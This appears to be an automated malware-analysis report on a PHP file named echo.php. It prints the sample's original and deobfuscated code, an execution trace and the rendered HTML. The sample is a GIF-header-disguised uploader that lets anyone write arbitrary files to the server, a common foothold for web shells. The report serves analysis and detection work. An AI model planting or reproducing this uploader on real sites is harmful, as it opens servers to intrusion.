PHP Malware Analysis

echo.php

md5: 0c26428689b45903bdf7613dd1f5ab72

Jump to:

Screenshot


Attributes

Files

Input


Deobfuscated PHP code

GIF89A;
<?php 
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Uploaded Successfully :p</b><br><br>";
    } else {
        echo "<b>Upload Failed! >:( </b><br><br>";
    }
}

Execution traces

data/traces/0c26428689b45903bdf7613dd1f5ab72_trace-1676251397.9354.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:23:43.833218]
1	0	1	0.000175	393512
1	3	0	0.000244	395752	{main}	1		/var/www/html/uploads/echo.php	0	0
1	3	1	0.000286	395752
			0.000318	314224
TRACE END   [2023-02-12 23:23:43.833396]


Generated HTML code

<html><head></head><body>GIF89A;
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></body></html>

Original PHP code

GIF89A;
<?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully :p</b><br><br>'; } else { echo '<b>Upload Failed! >:( </b><br><br>'; } } ?>